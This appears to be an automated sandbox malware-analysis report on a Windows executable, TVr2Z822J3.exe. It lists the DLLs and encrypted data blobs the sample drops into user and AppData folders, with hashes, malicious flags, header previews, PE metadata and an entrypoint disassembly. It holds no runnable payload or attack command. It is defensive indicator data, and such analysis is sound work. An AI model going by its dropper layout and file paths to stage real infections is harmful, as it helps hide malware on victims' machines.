Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............ho..ho..ho.....ho.....ho.....ho..hn.{ho......ho.....Zho.....ho.....ho......ho......ho......ho.Rich.ho.................PE..d...u.NK.........." .........2...............................................P............@.............................................C6......d............p..$u......`.... ......`...............................................X................................text............................... ..`.data............^..................@....pdata..$u...p...v..................@..@.idata..............................@....rsrc...............................@..@.reloc...&... ...&..................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\UploadHost_UW\dcfa

Process:	C:\Users\user\ActiveISO.exe
File Type:	data
Category:	dropped
Size (bytes):	4608873
Entropy (8bit):	7.958889302680503
Encrypted:	false
SSDEEP:	98304:yrR9F0WCyNwWKIVyFlF5a8qLn6WK/M4jb64MbzGzpZ3ICk:QjFnnxxyFPiZK/MCgbzGT3ICk
MD5:	0ABD50C8D2FAE352F4017D0177C63DD6
SHA1:	597C7AACA89C0D281BA5713799FCAE97C595321C
SHA-256:	3292060C07C495ED061CF362CE7788B977B111A8F163CA2F5038080DED66D14B
SHA-512:	28AC1F826F00D8E70BAC19773EEC4D14F0EB308AD33229DC900855B45BFCFC7EA4AF4D2B025342EB96E9B6BB17D0FE47577B031177653220720B361D0397A6FC
Malicious:	false
Preview:	..I.`C.Bn..Tk[]g.....Y....HnB.KU.s.U..`...D.cc.tm`M..bS.....vi..b.......IZ.P.tiRpU.q..R.P..rCd[...o.VOQ]Xc..cM.V.ilY..\.sI...J.i...cd.b.wOF.^...mA.b.k.iX.`..Pwj...RL.xV......r^S..RTPk..._.Ak.TN.kZ....yV......h.\...y.g.e..Il.]..mXE_.M.O..l.KZ.tU\...WH.....RiK..p...EO.L.H..E.QH....qctw....L.A..\Cdv.Cf...Hl..HGVBM...pRdZ...WT...L]x..FX....l.E.`b.....k.KQdx...S.RVF.J.vI..SZ..ijbyV.c_..GBqShamxdX..T...Nd....L...r.S..Vs.^[J.S.^..IR....I..T..\T.v_.d.`..ns.WXbR....Od.....dEoJ..ZtT.lg.]vy.q.fs.g.W._....K...gY....M..lO.._.ujp..`.O..iAN..W..R..M`..E...L..Y.HDvVst.hb.MYp......wY..G..H..i...[T.A.Aprxmagr.s...R.MS..B.OjgJtZ..R.ia..jQ..o......nbPB..kQ..juD.j.Vqs\Vh..[..._.sd.Mj\mo.CLQTW..s.]...CJ.h.ly.Lf...g...y.M.As.ftxs..p.AV.h\...V.rA.ND..f..d..N..[..O.f_rr..G.dWwFiAxlb....obtEPy..K.d.....Dg._s...X]Ov...EXW.ts.cTY...MB.....d.fe..Gipq.^.C..H....r...KHkh.]..F[q..T...U.g^OL.k.ou.b..B_.W..fp.g.jevD..t.P.o...SOr.L...NJp[.ka.N.M..L.a..p....j...qT.....eX.k..lH..i....d..jd.G....`..DS.....lB.....GPps.....h

C:\Users\user\AppData\Roaming\UploadHost_UW\msvcp140.dll

Process:	C:\Users\user\ActiveISO.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	571312
Entropy (8bit):	6.492350759123951
Encrypted:	false
SSDEEP:	12288:Rsjw3shF+jss1I8CgEWTe5+YMCMGz2MMY5U489wiyaf+QEKZm+jWodEEVksLd:Rs/5U4RBaf+QEKZm+jWodEECsL
MD5:	7DB24201EFEA565D930B7EC3306F4308
SHA1:	880C8034B1655597D0EEBE056719A6F79B60E03C
SHA-256:	72FE4598F0B75D31CE2DC621E8EF161338C6450BB017CD06895745690603729E
SHA-512:	BAC5729A3EB53E9BC7B680671D028CABEF5EA102DFAA48A7C453B67F8ECB358DB9F8FB16B3B1D9EA5A2DFF34F459F6AC87F3A563C736D81D31048766198FF11E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T4...U...U...U...'...U...-8..U...U...U..p/...U..p/...U..p/...U..p/...U..p/...U..p/T..U..p/...U..Rich.U..........PE..d...,pd..........." ... .H...b.......3..............................................r.....`A.........................................H..h...."..,...............8:.......'......8.......p...........................@...@............`...............................text....G.......H.................. ..`.rdata..b....`.......L..............@..@.data...P:...@.......(..............@....pdata..8:.......<...F..............@..@.rsrc...............................@..@.reloc..8...........................@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\UploadHost_UW\vcruntime140.dll

Process:	C:\Users\user\ActiveISO.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	98736
Entropy (8bit):	6.474996871326343
Encrypted:	false
SSDEEP:	1536:BxhUQePlHhR46rXHHGI+mAAD4AeDuXMycecb8i10DWZz:Bvk4wHH+mZD4ADAecb8G1
MD5:	F12681A472B9DD04A812E16096514974
SHA1:	6FD102EB3E0B0E6EEF08118D71F28702D1A9067C
SHA-256:	D66C3B47091CEB3F8D3CC165A43D285AE919211A0C0FCB74491EE574D8D464F8
SHA-512:	7D3ACCBF84DE73FB0C5C0DE812A9ED600D39CD7ED0F99527CA86A57CE63F48765A370E913E3A46FFC2CCD48EE07D823DAFDD157710EEF9E7CC1EB7505DC323A2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.&k..H8..H8..H8.I9..H8...8..H8..I8(.H8e.K9..H8e.L9..H8e.M9..H8e.H9..H8e..8..H8e.J9..H8Rich..H8................PE..d....9............" ... .....`......`.....................................................`A........................................0C..4...dK...............p..p....Z...'...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......B..............@....pdata..p....p.......F..............@..@_RDATA..\............R..............@..@.rsrc................T..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\UploadHost_UW\vcruntime140_1.dll

Process:	C:\Users\user\ActiveISO.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	38304
Entropy (8bit):	6.3923853431578035
Encrypted:	false
SSDEEP:	768:Xhh4pTUUtmUwqiu8oSRjez6SD7GkxZYj/9zLUr:xJ9x70GkxuZz2
MD5:	75E78E4BF561031D39F86143753400FF
SHA1:	324C2A99E39F8992459495182677E91656A05206
SHA-256:	1758085A61527B427C4380F0C976D29A8BEE889F2AC480C356A3F166433BF70E
SHA-512:	CE4DAF46BCE44A89D21308C63E2DE8B757A23BE2630360209C4A25EB13F1F66A04FBB0A124761A33BBF34496F2F2A02B8DF159B4B62F1B6241E1DBFB0E5D9756
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L......................h.........G.........:...h.......h.......h.......h.......h.+.....h.......Rich............................PE..d................." ... .:...6.......A..............................................B.....`A.........................................m.......m..x....................n...'......D....c..p...........................`b..@............P..`............................text....9.......:.................. ..`.rdata..."...P...$...>..............@..@.data................b..............@....pdata...............d..............@..@.rsrc................h..............@..@.reloc..D............l..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\UploadHost_UW\vechpt

Process:	C:\Users\user\ActiveISO.exe
File Type:	data
Category:	dropped
Size (bytes):	15745
Entropy (8bit):	6.185378376185804
Encrypted:	false
SSDEEP:	384:l/Yzs6zZ+ic3FE2IUZmwKy8mfOCdLnryfBsFhs:lgzsITfkmwKy8ZhKFW
MD5:	DD899CA13E5BEF55BCEA07E167DA891B
SHA1:	E883F0240F127520486F063B033FB34FA2DFE5C1
SHA-256:	A818D6FA8CADDAA608345EA40B75073A7C98637161794918566E2DDEEEDE47E7
SHA-512:	E38437899FCC433EF89A04C6A68684EA5110181AF48A4699836939CF167D0C1FE7932432518445E90ACBCBC151EE324D77DE064147D97FDEDF6ECABAAC788C06
Malicious:	false
Preview:	.m.c.T^YvvPEcE..l.avS...P.._..h..Dlx.hCl.fu......Ih.f...B..JIR..pG.c.G.iaX.g.d..T...u\.r..].Uu.V...k..R.WXwsZx.QMQ..S.r..^...ZZ.b.a...n`jfH.`]SKoUQw..D.......s...tY..OT.b..lENXo.p...Hd.RWjEw.......Y..u.C.......rp.a.V.oN\c_UC.ox.Q......X....YwX..tkn.V...g.W^c._B....EdgW.gu.YN..ICA.p.....Z.o.ev.N..tH....pyyLt.T..A.XHk.duaxpkY.AUT.....gp.TCn..Sxjm...EM...Cb[U.t.ZGlC.c.dT.mYl...R.nJ.....drk..qLuv.y.q..COa.....D....hU._..e.....^]..C.X..IP.Z.BXf.X.b....y.QwB.txZ..^B.....Mp\j...Z.il.f...UQ.x.e`.^.....Mw.Z....ud[oVNa..d..o.HJsP.wY...Af...A.M.Ur.X..S.i[j..VE...I..iiqH...s^...B.I..ZV....`rUNP.....n...JS..Qq..R..Qvar...Z.Ce..Vac[S...I.[.D.....D.qWS.k.V]vG.EVLk..v.XwoA....w..lE.n.m..UPm.Iai.u.......kAhf.Q.n.t.g.v.^P..c._.hC\b.cpc..L.......o...C`.`Q.O..NF.[.V.e..U\hj.X.u.ZHnL.f.....SAm.G..X]..X.FJ....K.....j[..e.ndEI..cDq..bB.a.fDX...YK....Tm.rAK.......I......HotwdB..K.v^qM.mM.`Rc..LI..LKR.......Rv.L....qO....`l..vG.Vjt.N...If[..A..`....h...t.t]...b..re.fm.PqOik.faF.U.J..X..FKG.\H.B..I..WXA._..R.N.

C:\Users\user\Qt5Core.dll

Process:	C:\Users\user\Desktop\TVr2Z822J3.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6133880
Entropy (8bit):	6.6556462442857764
Encrypted:	false
SSDEEP:	98304:8TjAe4iOtBel1xJsv6tWKFdu9C0eo74QerqfAR:8TjAetoBEJsv6tWKFdu9C017derqfAR
MD5:	8C735052A2D4E9B01B0E028F0C20F67C
SHA1:	B72BDE11DE3310A495DD16520362F4ADBF21717A
SHA-256:	D751AB0357F71586B1793CE4166295ABA085334647D6E3FFCD49287A801273E7
SHA-512:	0BBD920E1B48361C7F3E1540DDB12FA6C9146BFE36E13EBA2B2E6CA8BF3AD961D88121C6F70ECA6D9EA413900455E696F7233C5BB54415CA7D2C9C1C0D4C1FB3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$............]...]...]..@]...]...\...]9l.]...]...\...]...\...]...\...]..\...]..\...]...]...]0..\...]0..\W..]0..\...]5.,]...]..D]...]0..\...]Rich...]................PE..d.....n].........." ......-.../.....$",......................................@^......-^...`...........................................S.......Z.......^......`[..q....].x.....^.."....L.T.....................L.(...p.L..............................................text.....-.......-................. ..`.rdata....,.......,...-.............@..@.data.........Z..P....Z.............@....pdata...q...`[..r....Z.............@..@.tls..........]......T].............@....gfids..,.....]......V].............@..@.rsrc.........^......X].............@..@.reloc..."....^..$...^].............@..B................................................................................................................................

C:\Users\user\Qt5Gui.dll

Process:	C:\Users\user\Desktop\TVr2Z822J3.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6494840
Entropy (8bit):	6.661788186831622
Encrypted:	false
SSDEEP:	49152:Olbw69/oyRlQ3bseHmQL7cE6Vvz4IBeEsBvf6MGde7l8UkqolD/SrneTbfrh4y+8:Olbw6a6GpcZsBv6szezn9IPRs9
MD5:	34893CB3D9A2250F0EDECD68AEDB72C7
SHA1:	37161412DF2C1313A54749FE6F33E4DBF41D128A
SHA-256:	CA8334B2E63BC01F0749AFEB9E87943C29882131EFE58608EA25732961B2DF34
SHA-512:	484E32832D69EC1799BD1BCC694418801C443C732ED59ECD76B3F67ABF0B1C97D64AE123728DFA99013DF846BA45BE310502EF6F8DA42155DA2E89F2A1E8CB2C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Ke[...5...5...5..\|....5......5.4Z6...5.4Z1...5.4Z4...5.4Z0...5.\|f4...5..Z4...5...4...5..Z1...5..Z0.W.5..Z5...5..Z...5.......5..Z7...5.Rich..5.................PE..d...>.n].........." .....f9...)......Z9.......................................c.......c...`.........................................`.C.<.....\.@.....c......._.<.....c.x.....c..,..0r?.T...................(s?.(....r?...............9../...........................text...be9......f9................. ..`.rdata...b$...9..d$..j9.............@..@.data........]..T....].............@....pdata..<....._......"_.............@..@.gfids..4....`c.......b.............@..@.tls.........pc.......b.............@....rsrc.........c.......b.............@..@.reloc...,....c.......b.............@..B................................................................................................................................

C:\Users\user\Qt5Network.dll

Process:	C:\Users\user\Desktop\TVr2Z822J3.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1314424
Entropy (8bit):	6.382115484562211
Encrypted:	false
SSDEEP:	24576:txQym4jK56LNWz/m7iNBd3ol84iKiEanXC:t1mrCNxiNBulliKiEaXC
MD5:	FE5ED4C5DA03077F98C3EFA91ECEFD81
SHA1:	E23E839EC0602662788F761EBE7DD4B39C018A7F
SHA-256:	D992AAEB21CB567113126C2912CF75E892C8E3EAD5D50147A11ABE704B9E2E2B
SHA-512:	22514732A0EDF8FC2B8770139599132429080B86D2844143D21BB834CBDDAAA077D763969960E39E2050A69493C1AAE191600E5DF6107BDE90FAE589A054F071
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Y?1.8Qb.8Qb.8Qb.@.b.8Qb.fRc.8Qb.fUc.8Qb.fPc.8Qb.fTc.8Qb.ZPc.8Qb.fPc.8Qb.8Pb`;Qb.fTc.8Qb.fQc.8Qb.f.b.8Qb.8.b.8Qb.fSc.8QbRich.8Qb........PE..d.....n].........." .........z...............................................`............`......................................... ...._...#..,....0....... ..T.......x....@.........T......................(...0................... ............................text...7........................... ..`.rdata...=.......>..................@..@.data....4......."..................@....pdata..T.... ......................@..@.gfids..4...........................@..@.tls......... ......................@....rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................

C:\Users\user\Qt5PrintSupport.dll

Process:	C:\Users\user\Desktop\TVr2Z822J3.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	324216
Entropy (8bit):	6.424811123526958
Encrypted:	false
SSDEEP:	6144:n5BVjwbCL85ofdeA2aqWs+41FwneMKAaol1cafGR27M1ffqp+1eszZnDy4SA:nBjwE8aVK
MD5:	D0634933DB2745397A603D5976BEE8E7
SHA1:	DDEC98433BCFEC1D9E38557D803BC73E1FF883B6
SHA-256:	7D91D3D341DBBA568E2D19382E9D58A42A0D78064C3AD7ADFE3C7BB14742C2B1
SHA-512:	9271370CD22115F68BD62572640525E086A05D75F5BC768F06E20B90B48A182F29A658A07099C7BC1E99BF0FFCF1229709524E2AF6745D6FED7B41C1ADDD09F1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........r.....}...}...}.k.}...}.M.\|...}.M.\|...}.M.\|...}.M.\|...}.q.\|...}zM.\|...}...}...}zM.\|...}zM.\|...}.Mc}...}...}...}zM.\|...}Rich...}................PE..d....n].........." .........................................................0.......H....`..........................................M...p.......................&......x.... ..@.......T.......................(.......................P"...........................text............................... ..`.rdata..............................@..@.data...............................@....pdata...&.......(..................@..@.gfids..4...........................@..@.tls................................@....rsrc...............................@..@.reloc..@.... ......................@..B................................................................................................................................................

C:\Users\user\Qt5Widgets.dll

Process:	C:\Users\user\Desktop\TVr2Z822J3.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5539448
Entropy (8bit):	6.61165878012579
Encrypted:	false
SSDEEP:	98304:oSIq7lPpagrGUtPm3qBF+1jIJJAi+eVq8:oSI8hagrGUtPm3KMRIL+e/
MD5:	C502BB8A4A7DC3724AB09292CD3C70D6
SHA1:	FF44FDDEEC2D335EC0EAA861714B561F899675FD
SHA-256:	4266918226C680789D49CF2407A7FEC012B0ED872ADAFB84C7719E645F9B2E6D
SHA-512:	73BEF89503CE032FBA278876B7DAB9EAC275632DF7A72C77093D433C932272DA997E8FBEB431A09D84BAAC7B2AB2E55222FF687893311949A5603E738BFA6617
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;....b..b..b.v.H.wb.D<.\|b.D<.ub.D<.{b.D<.hb....ub..<.zb..b.no..<..b..<.~b..<$.~b..bL.~b..<.~b.Rich.b.................PE..d.....n].........." ......3... .......3.......................................T......4U...`......................................... .D.TQ..t>M......@T.......P..e...pT.x....PT.... =@.T....................>@.(....=@...............4..h...........................text.....3.......3................. ..`.rdata........4.......4.............@..@.data........P..~....O.............@....pdata...e....P..f...rP.............@..@.gfids..4.... T.......S.............@..@.tls.........0T.......S.............@....rsrc........@T.......S.............@..@.reloc......PT.......S.............@..B................................................................................................................................................

C:\Users\user\StarBurn.dll

Process:	C:\Users\user\Desktop\TVr2Z822J3.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1505376
Entropy (8bit):	6.361832549375939
Encrypted:	false
SSDEEP:	24576:NbKpao+9Uybarjs1FHw9guJfkTK39MOCRZnVVWjk+amEObzznf9:NbKpaGEw9diEjkuEObzznf9
MD5:	41E19BA2364F2C834B2487E1D02BB99A
SHA1:	6C61D603DDDFE384A93AD33775B70681D0A396D9
SHA-256:	C040A25377028B0C28DB81A012DE786C803A0E9D6F87CE460335A621D31F5340
SHA-512:	6EBF4A9E80F16C6A03FF357D2DA9A34A4227BFD65EB66D1D335349A77BA066D069BA0D47D46229B3C77B59052C42D388678662F970B418D8CC3CFB1223427D8C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............ho..ho..ho.....ho.....ho.....ho..hn.{ho......ho.....Zho.....ho.....ho......ho......ho......ho.Rich.ho.................PE..d...u.NK.........." .........2...............................................P............@.............................................C6......d............p..$u......`.... ......`...............................................X................................text............................... ..`.data............^..................@....pdata..$u...p...v..................@..@.idata..............................@....rsrc...............................@..@.reloc...&... ...&..................@..B................................................................................................................................................................................................................................................

C:\Users\user\dcfa

Process:	C:\Users\user\Desktop\TVr2Z822J3.exe
File Type:	data
Category:	dropped
Size (bytes):	4608873
Entropy (8bit):	7.958889302680503
Encrypted:	false
SSDEEP:	98304:yrR9F0WCyNwWKIVyFlF5a8qLn6WK/M4jb64MbzGzpZ3ICk:QjFnnxxyFPiZK/MCgbzGT3ICk
MD5:	0ABD50C8D2FAE352F4017D0177C63DD6
SHA1:	597C7AACA89C0D281BA5713799FCAE97C595321C
SHA-256:	3292060C07C495ED061CF362CE7788B977B111A8F163CA2F5038080DED66D14B
SHA-512:	28AC1F826F00D8E70BAC19773EEC4D14F0EB308AD33229DC900855B45BFCFC7EA4AF4D2B025342EB96E9B6BB17D0FE47577B031177653220720B361D0397A6FC
Malicious:	false
Preview:	..I.`C.Bn..Tk[]g.....Y....HnB.KU.s.U..`...D.cc.tm`M..bS.....vi..b.......IZ.P.tiRpU.q..R.P..rCd[...o.VOQ]Xc..cM.V.ilY..\.sI...J.i...cd.b.wOF.^...mA.b.k.iX.`..Pwj...RL.xV......r^S..RTPk..._.Ak.TN.kZ....yV......h.\...y.g.e..Il.]..mXE_.M.O..l.KZ.tU\...WH.....RiK..p...EO.L.H..E.QH....qctw....L.A..\Cdv.Cf...Hl..HGVBM...pRdZ...WT...L]x..FX....l.E.`b.....k.KQdx...S.RVF.J.vI..SZ..ijbyV.c_..GBqShamxdX..T...Nd....L...r.S..Vs.^[J.S.^..IR....I..T..\T.v_.d.`..ns.WXbR....Od.....dEoJ..ZtT.lg.]vy.q.fs.g.W._....K...gY....M..lO.._.ujp..`.O..iAN..W..R..M`..E...L..Y.HDvVst.hb.MYp......wY..G..H..i...[T.A.Aprxmagr.s...R.MS..B.OjgJtZ..R.ia..jQ..o......nbPB..kQ..juD.j.Vqs\Vh..[..._.sd.Mj\mo.CLQTW..s.]...CJ.h.ly.Lf...g...y.M.As.ftxs..p.AV.h\...V.rA.ND..f..d..N..[..O.f_rr..G.dWwFiAxlb....obtEPy..K.d.....Dg._s...X]Ov...EXW.ts.cTY...MB.....d.fe..Gipq.^.C..H....r...KHkh.]..F[q..T...U.g^OL.k.ou.b..B_.W..fp.g.jevD..t.P.o...SOr.L...NJp[.ka.N.M..L.a..p....j...qT.....eX.k..lH..i....d..jd.G....`..DS.....lB.....GPps.....h

C:\Users\user\msvcp140.dll

Process:	C:\Users\user\Desktop\TVr2Z822J3.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	571312
Entropy (8bit):	6.492350759123951
Encrypted:	false
SSDEEP:	12288:Rsjw3shF+jss1I8CgEWTe5+YMCMGz2MMY5U489wiyaf+QEKZm+jWodEEVksLd:Rs/5U4RBaf+QEKZm+jWodEECsL
MD5:	7DB24201EFEA565D930B7EC3306F4308
SHA1:	880C8034B1655597D0EEBE056719A6F79B60E03C
SHA-256:	72FE4598F0B75D31CE2DC621E8EF161338C6450BB017CD06895745690603729E
SHA-512:	BAC5729A3EB53E9BC7B680671D028CABEF5EA102DFAA48A7C453B67F8ECB358DB9F8FB16B3B1D9EA5A2DFF34F459F6AC87F3A563C736D81D31048766198FF11E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T4...U...U...U...'...U...-8..U...U...U..p/...U..p/...U..p/...U..p/...U..p/...U..p/T..U..p/...U..Rich.U..........PE..d...,pd..........." ... .H...b.......3..............................................r.....`A.........................................H..h...."..,...............8:.......'......8.......p...........................@...@............`...............................text....G.......H.................. ..`.rdata..b....`.......L..............@..@.data...P:...@.......(..............@....pdata..8:.......<...F..............@..@.rsrc...............................@..@.reloc..8...........................@..B................................................................................................................................................................................................................................................................

C:\Users\user\vcruntime140.dll

Process:	C:\Users\user\Desktop\TVr2Z822J3.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	98736
Entropy (8bit):	6.474996871326343
Encrypted:	false
SSDEEP:	1536:BxhUQePlHhR46rXHHGI+mAAD4AeDuXMycecb8i10DWZz:Bvk4wHH+mZD4ADAecb8G1
MD5:	F12681A472B9DD04A812E16096514974
SHA1:	6FD102EB3E0B0E6EEF08118D71F28702D1A9067C
SHA-256:	D66C3B47091CEB3F8D3CC165A43D285AE919211A0C0FCB74491EE574D8D464F8
SHA-512:	7D3ACCBF84DE73FB0C5C0DE812A9ED600D39CD7ED0F99527CA86A57CE63F48765A370E913E3A46FFC2CCD48EE07D823DAFDD157710EEF9E7CC1EB7505DC323A2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.&k..H8..H8..H8.I9..H8...8..H8..I8(.H8e.K9..H8e.L9..H8e.M9..H8e.H9..H8e..8..H8e.J9..H8Rich..H8................PE..d....9............" ... .....`......`.....................................................`A........................................0C..4...dK...............p..p....Z...'...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......B..............@....pdata..p....p.......F..............@..@_RDATA..\............R..............@..@.rsrc................T..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................................

C:\Users\user\vcruntime140_1.dll

Process:	C:\Users\user\Desktop\TVr2Z822J3.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	38304
Entropy (8bit):	6.3923853431578035
Encrypted:	false
SSDEEP:	768:Xhh4pTUUtmUwqiu8oSRjez6SD7GkxZYj/9zLUr:xJ9x70GkxuZz2
MD5:	75E78E4BF561031D39F86143753400FF
SHA1:	324C2A99E39F8992459495182677E91656A05206
SHA-256:	1758085A61527B427C4380F0C976D29A8BEE889F2AC480C356A3F166433BF70E
SHA-512:	CE4DAF46BCE44A89D21308C63E2DE8B757A23BE2630360209C4A25EB13F1F66A04FBB0A124761A33BBF34496F2F2A02B8DF159B4B62F1B6241E1DBFB0E5D9756
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L......................h.........G.........:...h.......h.......h.......h.......h.+.....h.......Rich............................PE..d................." ... .:...6.......A..............................................B.....`A.........................................m.......m..x....................n...'......D....c..p...........................`b..@............P..`............................text....9.......:.................. ..`.rdata..."...P...$...>..............@..@.data................b..............@....pdata...............d..............@..@.rsrc................h..............@..@.reloc..D............l..............@..B................................................................................................................................................................................................................................................

C:\Users\user\vechpt

Process:	C:\Users\user\Desktop\TVr2Z822J3.exe
File Type:	data
Category:	dropped
Size (bytes):	15745
Entropy (8bit):	6.185378376185804
Encrypted:	false
SSDEEP:	384:l/Yzs6zZ+ic3FE2IUZmwKy8mfOCdLnryfBsFhs:lgzsITfkmwKy8ZhKFW
MD5:	DD899CA13E5BEF55BCEA07E167DA891B
SHA1:	E883F0240F127520486F063B033FB34FA2DFE5C1
SHA-256:	A818D6FA8CADDAA608345EA40B75073A7C98637161794918566E2DDEEEDE47E7
SHA-512:	E38437899FCC433EF89A04C6A68684EA5110181AF48A4699836939CF167D0C1FE7932432518445E90ACBCBC151EE324D77DE064147D97FDEDF6ECABAAC788C06
Malicious:	false
Preview:	.m.c.T^YvvPEcE..l.avS...P.._..h..Dlx.hCl.fu......Ih.f...B..JIR..pG.c.G.iaX.g.d..T...u\.r..].Uu.V...k..R.WXwsZx.QMQ..S.r..^...ZZ.b.a...n`jfH.`]SKoUQw..D.......s...tY..OT.b..lENXo.p...Hd.RWjEw.......Y..u.C.......rp.a.V.oN\c_UC.ox.Q......X....YwX..tkn.V...g.W^c._B....EdgW.gu.YN..ICA.p.....Z.o.ev.N..tH....pyyLt.T..A.XHk.duaxpkY.AUT.....gp.TCn..Sxjm...EM...Cb[U.t.ZGlC.c.dT.mYl...R.nJ.....drk..qLuv.y.q..COa.....D....hU._..e.....^]..C.X..IP.Z.BXf.X.b....y.QwB.txZ..^B.....Mp\j...Z.il.f...UQ.x.e`.^.....Mw.Z....ud[oVNa..d..o.HJsP.wY...Af...A.M.Ur.X..S.i[j..VE...I..iiqH...s^...B.I..ZV....`rUNP.....n...JS..Qq..R..Qvar...Z.Ce..Vac[S...I.[.D.....D.qWS.k.V]vG.EVLk..v.XwoA....w..lE.n.m..UPm.Iai.u.......kAhf.Q.n.t.g.v.^P..c._.hC\b.cpc..L.......o...C`.`Q.O..NF.[.V.e..U\hj.X.u.ZHnL.f.....SAm.G..X]..X.FJ....K.....j[..e.ndEI..cDq..bB.a.fDX...YK....Tm.rAK.......I......HotwdB..K.v^qM.mM.`Rc..LI..LKR.......Rv.L....qO....`l..vG.Vjt.N...If[..A..`....h...t.t]...b..re.fm.PqOik.faF.U.J..X..FKG.\H.B..I..WXA._..R.N.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.997888361970767
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	TVr2Z822J3.exe
File size:	11'140'776 bytes
MD5:	467e95c9a46987552925c47bc7b38916
SHA1:	3732116b8ef5ee6094ea49a0658dcb7a7adb2634
SHA256:	abe7cc92554b2defc6c336d5cafabe798f1f6c75076ccce897d6337fdbc42fd5
SHA512:	f79659b65bd565785c6ae5ac442a8e5c016cbda9968eea7267a7d281f13cfe04f6228e3e311a0ae7f7848d9e0e407cefc16001cd28bd7e631414d5bd206695b7
SSDEEP:	196608:FppMHcmWuVIdrgeXoNY9kRsYuXZx7bbWtKm2eRe2tfny7NY+Uvl7a9tJJwZ4OZ7c:Fppky+IJX9kIOATpYtl7a9ZwZBZY
TLSH:	A9B63394B5E358F3C17521B0EC696C1222B7A32A45E14E0B8BC76F1946E37A7428F35F
File Content Preview:	MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...~.&L.....................J...............0....@.................................L........................................P..........,..................

File Icon


Icon Hash:	293250cc83f2623f

Static PE Info

General

Entrypoint:	0x411def
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x4C26F87E [Sun Jun 27 07:06:38 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b5a014d7eeb4c2042897567e1288a095

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 00414C50h
push 00411F80h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [00413184h]
pop ecx
or dword ptr [00419924h], FFFFFFFFh
or dword ptr [00419928h], FFFFFFFFh
call dword ptr [00413188h]
mov ecx, dword ptr [0041791Ch]
mov dword ptr [eax], ecx
call dword ptr [0041318Ch]
mov ecx, dword ptr [00417918h]
mov dword ptr [eax], ecx
mov eax, dword ptr [00413190h]
mov eax, dword ptr [eax]
mov dword ptr [00419920h], eax
call 00007F9124DDA202h
